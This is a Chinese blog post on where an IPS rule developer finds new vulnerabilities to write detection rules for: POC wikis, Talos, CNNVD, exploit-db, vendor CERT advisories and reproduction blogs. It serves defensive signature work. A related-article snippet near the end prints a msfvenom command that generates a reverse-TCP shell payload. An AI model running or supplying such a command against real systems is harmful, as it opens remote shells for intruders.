IPS的规则从哪来

最新推荐文章于 2024-05-11 07:48:49 发布
最新推荐文章于 2024-05-11 07:48:49 发布
阅读量1.5k 收藏 11
点赞数 1
分类专栏: 入侵检测 文章标签: IPS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/120167020
版权

目录

前言

IPS,一种防御网络攻击的设备,除了防御常见的web攻击、黑客工具攻击……更重要的是能够针对当下爆出的新漏洞进行防御。那么,当你面对一个日渐完善的规则库,如何继续开发新的规则呢?下面介绍一下我找漏洞的一些思路。

PeiQI WiKi文库⭐⭐⭐

我最喜欢的漏洞文库,简明扼要的记录的漏洞的利用方式,告诉你fofa要搜索的内容、漏洞点、POC,并且文库覆盖范围全面。经过我三遍的翻看,基本能写的规则全都写上去了。
文库分为4中访问方式:

  • 博客地址:http://www.peiqi.tech/
  • Gitbook地址【首推】:http://wiki.peiqi.tech
  • Github地址:https://github.com/PeiQi0/PeiQi-WIKI-POC
  • 码云地址:https://gitee.com/yelisenyu/wiki

这里首推 Gitbook,阅读很舒服,博客地址只简单的记录了几个漏洞,太少,Github和码云凑合着也能看吧。但是从9月1日《网络产品安全漏洞管理规则》发布之后,目前只有博客地址和码云地址可以访问,其他地址都已经凉凉。
透过互联网历史博物馆Internet Archive (Digital Library)可以看到曾经Gitbook的PeiQI WiKi
在这里插入图片描述

TALOS⭐⭐⭐⭐

TALOS最大的亮点在于漏洞库更新及时,覆盖面光,并且有较为详细的利用报告,并且不会被屏蔽,实属难得。而且,这个漏洞库还是国家信息安全漏洞库收集漏洞信息的参考平台之一。
https://talosintelligence.com/vulnerability_info
在这里插入图片描述

国家信息安全漏洞库⭐⭐⭐⭐⭐

http://www.cnnvd.org.cn/web/index.html
之前我对这个网站的误解太深了,以为它只有漏洞描述信息,现在才知道它才是最强漏洞库,它的强大不在于自身提供了多好的复现,而是它的参考链接!我可以通过它的参考链接去复现漏洞,这就意味着仅通过它,我将有写不完的规则。
在这里插入图片描述
需要特别注意的是,我推荐的是 国家信息安全漏洞库,下面模样。
在这里插入图片描述
别稀里糊涂的进了 国家信息安全漏洞共享平台
在这里插入图片描述

白阁文库

个人对白阁文库的感觉一般,里面的内容有不少引自先知社区,涉及较多的代码审计。在内容方面,没有PeiQI文库简单明朗,很多地方写的内容,还有待提升,其中1个很蛋疼的地方是,一旦点击了排名靠下的漏洞,页面会刷新,导致找不到你点击的那个漏洞名字了。好在漏洞库还很丰富,也能凑合着用。
访问地址:
官网地址【凉凉】:https://wiki.bylibrary.cn/
Github地址【可用】:https://baizesec.github.io/bylibrary/
在这里插入图片描述

seebug

追踪当下新爆出的漏洞,可以关注这个网站https://www.seebug.org/search/
在这里插入图片描述

CERT

与seebug类似的,还有安全厂商的CERT
诸如:
360cert:https://cert.360.cn/warning
在这里插入图片描述
阿里云漏洞库:https://avd.aliyun.com/
在这里插入图片描述
阿里云漏洞通告:https://help.aliyun.com/noticelist/9213612.html
在这里插入图片描述

exploit-db

一个知名的漏洞平台,找不到新漏洞的时候,可以来这里瞅两眼,https://www.exploit-db.com/
在这里插入图片描述

pwnwiki

一个有点类似exploit-db的网站,找不到漏洞的时候可以来这里瞅瞅
https://www.pwnwiki.org/index.php?title=Main_Page
目前站点也受到相关影响,不能直接访问了
在这里插入图片描述

漏洞复现博客

CSDN上有些作者有很多的漏洞复现,可以去检查自己公司的漏洞库有没有覆盖完全,如:
锋刃科技:https://blog.csdn.net/xuandao_ahfengren/category_10090915.html?spm=1001.2014.3001.5515

在这里插入图片描述
维梓梓:https://blog.csdn.net/zy15667076526/category_10534276_2.html
在这里插入图片描述
维梓梓:https://blog.csdn.net/zy15667076526/category_10361202.html

在这里插入图片描述

针对工具

可以针对黑客工具开发相关规则。
如webshell管理工具:https://xz.aliyun.com/t/9397#toc-12
在这里插入图片描述
如扫描工具:https://blog.csdn.net/weixin_44288604/category_10393890.html?spm=1001.2014.3001.5482
在这里插入图片描述
更多:https://github.com/hudunkey/Red-Team-links
在这里插入图片描述

其他

在上面的各种方法尝试完毕,还是没有规则写的时候,就好比现在。又找到了新的方向,规则转换。

  1. WAF规则转IPS
    这种思路就是顾名思义了,看看WAF匹配的都是个啥,然后根据漏洞点转换为IPS
  2. 找同事
    这两天发现的一个思路,离职的同事有不少规则虽然添加到了平台,但是由于种种原因,不少规则没有加入到设备中,那么就可以把同事遗留下来的规则,从平台添加到设备中去😛
lainwith
关注
  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
exploit-db图文教程
xiongIT的博客
12-04 3832
ExploitDB 是一个面向全世界黑客的漏洞提交平台,该平台会公布最新漏洞的相关情况,这些可以帮助企业改善公司的安全状况,同时也以帮助安全研究者和渗透测试工程师更好的进行安全测试工作。Exploit-DB 提供一整套庞大的归档体系,其中涵盖了各类公开的攻击事件、漏洞报告、安全文章以及技术教程等资源。
IPS报文简单介绍.rar
04-06
- **策略配置**:管理员可以根据组织的安全需求,定制IPS的检测规则和响应策略,例如允许某些类型的流量,阻断其他。 - **日志与报告**:IPS报文记录在日志中,可供后续分析和审计,以便追踪攻击源,评估安全状况,...
IPS规则开发中常见问题清单
LainWith的博客
02-25 2462
目录规则问题1:研判2:http请求与响应3:http头与http正文4:关键字flowtcp.optiondsizehttp.host_lenhttp_headeroffset/dsize5:协议加密协议ftp协议telnet协议6:明文匹配7:深度8:数据包回环地址 规则问题 1:研判 请确认规则是否勾选了研判,以及虚拟机在跑规则的时候,是否开启了研判 显示(尝试)(成功) ips rule_judge config judge_rule_alert switch on 只显示(尝试) ips ru
网络安全高质量文库
saber的博客
07-09 1409
在学习网络安全的过程中,持续的学习和实践是非常关键的。虽然这些网站可以提供丰富的学习资源,但要真正掌握网络安全的技能,需要不断地学习、思考和实践。相信自己的能力,坚持不懈地追求知识,我们每个人都能够成为网络安全的中坚力量。最后,我希望各位能够利用这些学习网络安全的网站资源,不仅提升自己的技能和知识,还能够为构建一个更加安全的网络环境作出贡献。让我们一同行动起来,保护好自己和他人的网络安全。
2024年最全网络安全人士必备的13个漏洞库_通用漏洞数据库,你还看不懂吗
最新发布
m0_60452293的博客
05-11 989
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
常用的漏洞库
孤的博客
08-10 6969
漏洞库 Vulhub 环境安装部署步骤,漏洞复现流程 https://www.wangan.com/docs/vulhub Middleware-Vulnerability-detection CVE、CMS、中间件漏洞检测利用合集 https://github.com/mai-lang-chai/Middleware-Vulnerability-detection 佩奇文库 环境搭建,POC,漏洞原理全部集合在一个文库 http://wiki.peiqi.tech/ 白阁文库 白阁文库是白泽Sec团队维护
IPS的原理以及使用手册(cisco4240)
Stephen_jj的博客
05-27 8309
IPS的原理以及使用手册(cisco4240) 好久没写博客了,今天终于把IPS的知识掌握完毕,所以将这些内容分析出来,感兴趣的同学请继续往下看。 本篇讲的内容会偏多,其中包括下面的几个方面: 1、IPS的基本原理 2、IPS的console的初始化 3、IDM环境搭建 4、IPS的在线模式和杂合模式 5、IPS的signature(签名/策略)和alerts(警告) 6、IPS signature engine(引擎)介绍 7、IPS参数调整 8、IPS的调控和配置blocking IPS的基本原理 IP
Goby-poc 161个
07-05
Goby自定义poc
IPSIDS特征识别和签名或规则编写
05-06
IPSIDS特征识别和签名或规则编写 IPS/IDS系统是指入侵检测系统(Intrusion Detection System),它可以检测和防止恶意网络活动。为了更好地实现IPS/IDS系统的功能,我们需要了解IPS/IDS特征识别和签名或规则编写。 ...
ips
02-10
可以用作匹配选择器的防火墙拒绝规则。 请注意,此威胁列表是根据个人条件精心设计的,成为该列表一部分的附加触发器如下: 已添加任何触发场所IP的IPS。 已添加任何请求直接IP作为其目的地以及HTTP / HTTPS协议...
入侵检测IPS下载
09-27
同时,还需要设置IPS规则和策略,以便正确地检测和处理网络流量。 在实际操作中,用户应确保了解IPS的基本原理和操作,以及GNS3的使用方法,因为这两者都需要一定的专业知识。此外,定期更新IPS的签名库也是至关...
PeiQi-WIKI-RED:林深时见鹿,海蓝时见鲸:deer:
04-28
PeiQi WiKi-RED文库:ewe: 关于文库 这个文库用于整合互联网上关于渗透测试的资料和技巧,与 相似,PeiQI WiKi-RED文库 同样也是开源面向所有人的,大家可以随时在线翻阅或者下载本地搭建:whale: 公众号和作者 [!NOTE] 更新的文章都会在第一时间推送在公众号,如果对文库有建议或者想要指出错误,可以扫一扫微信加我好友:penguin: 关于使用 文库使用的是,因为风格比较清新,简洁。于是便选择了它来搭建文库。 目前Wiki文库是开源的,每一个人都可以下载随时翻阅:dolphin: [!NOTE] 每个模块都有可用工具,有使用方法和一些技巧 [!NOTE] 部分检测脚本放在POC目录中 如何本地使用 [!NOTE] 1.Github 拉取代码 git clone git clone https://github.com/PeiQi0/wiki.git 2.下载 gitbook a
PeiQi0#PeiQi-WIKI-Book#致远OA A6 createMysql.jsp 数据库敏感信息泄露1
07-25
致远OA A6 createMysql.jsp 数据库敏感信息泄露漏洞描述致远OA A6 存在数据库敏感信息泄露,攻击者可以通过访问特定的URL获取数据库账户以
SRC漏洞挖掘技巧(0基础入门到精通),只要收藏这一篇就够了!!
jiabeauty的博客
04-03 1581
今天就分享一下公益SRC漏洞的批量挖掘的技巧和所要用到的一些相关的工具和脚本出来和各位师傅交流一下,不足之处还希望师傅们多多指教。0x01 国内的一些公益src漏洞平台漏洞盒子:https://www.vulbox.com补天漏洞响应平台:https://www.butian.netCNNVD信息安全漏洞库:https://www.cnnvd.org.cn``教育漏洞提交平台:https://src.sjtu.edu.cn网络安全产业就像一个江湖,各色人等聚集。
利用 exploit-db 交叉编译 shellcode
YouTheFreedom的博客
09-22 560
shellcode 通用编写方法 获得shellcode一般有如下五种办法: pwntools: asm(shellcraft.arm.linux.sh(),arch=’arm’) msfvenom: msfvenom -p linux/armle/shell/reverse_tcp LHOST=192.168.1.100 LPORT=6666 -f py -o msf.py shell-storm: http://shell-storm.org/shellcode/ exploit-db: https
攻击者对 Exploit-DB平台的利用分析
m0_73803866的博客
10-23 625
我们针对已知的漏洞利用攻击进行了分析,一些常见漏洞利用每个月的攻击趋势如图 3.6 所示,针 对使用 Realtek SDK 的 miniigd SOAP 服务的设备在 2 月到 6 月之间的漏洞利用攻击数最多,峰值在 5 月份,高达 5.4 亿次,这个数值是同月份漏洞利用攻击次数第二高的漏洞的 5 倍。通过绿盟威胁捕获系统,我们共捕获到上百种物联网漏洞的利用行为,攻击者漏洞利用的主要目标 设备类型同样是路由器和摄像头,占比 80% 以上,除此之外,网络存储设备和网络电话设备也逐渐成 为被利用对象。
SearchSploit漏洞查找工具使用指南
大方子
10-04 7579
什么是SearchSploit: “searchsploit”是一个用于Exploit-DB的命令行搜索工具,它还允许你随身带一份Exploit-DB的副本。 SearchSploit为您提供了在本地保存的存储库中执行详细的离线搜索的能力。这种能力特别适用于在没有互联网接入的情况下对网络进行安全评估。许多漏洞都包含了二进制文件的链接,这些文件不包含在标准存储库中,但可以在我们的Exploit-...
IDS和IPS
热门推荐
七天
03-13 1万+
文章目录一、入侵检测系统1、入侵检测系统的构成与功能2、入侵检测系统的分类2.1、按照检测类型划分2.2、按照检测对象划分3、入侵检测系统的部署二、入侵防御系统1、IPS主要的技术优势2、入侵防御系统的分类三、IDS、IRS、IPS的关联 一、入侵检测系统 入侵检测是指"通过对行为、安全日志或审计数据或其他网络上可以获得的信息进行操作,检测到对系统的闯入或闯入的企图"。 入侵检测技术:是用来发现内部攻击、外部攻击和误操作的一种方法。它是一种动态的网络安全技术,利用不同的引|擎实时或定期地对网络数据源进行
topsec***检测系统规则库手动升级
weixin_34122548的博客
12-02 2669
一、首先从ftp://topsec.com.cn去下载最新的规则库 1.进入:“ssl***及UTM”目录,再进入“webfilter”目录下载最新的URL过滤规则库2.进入“***防御(TOP-IDP)”目录,再进入子目录下的“规则库升级”,下载最新的av-v2016.12.02.tir应用识别规则库和ips-v2016.11.30.tir***检测规则库二、手动加载规则库...
天融信ips规则库升级
08-16
天融信IPS规则库升级是指对天融信系统中的入侵防御系统(IPS规则库进行更新和升级。IPS规则库包含了针对已知攻击和漏洞的检测和防御规则,通过定期更新和升级规则库,可以增强系统对新出现的威胁的识别和防御能力。 升级IPS规则库通常具有以下目的: 1. 新增攻击和漏洞的检测规则:随着网络威胁的不断演进,新的攻击技术和漏洞可能会出现。通过升级规则库,可以及时识别新出现的攻击行为,提高系统的安全性。 2. 修复已知漏洞和弱点:IPS规则库升级还可以修复已知的漏洞和弱点,以减少系统受到攻击的风险。 3. 优化规则库性能:升级规则库还可以对现有规则进行优化,提高系统的性能和效率。 升级IPS规则库可以通过天融信官方网站或者系统管理界面进行下载和安装。建议定期检查和升级IPS规则库,以保持系统的安全性和防御能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值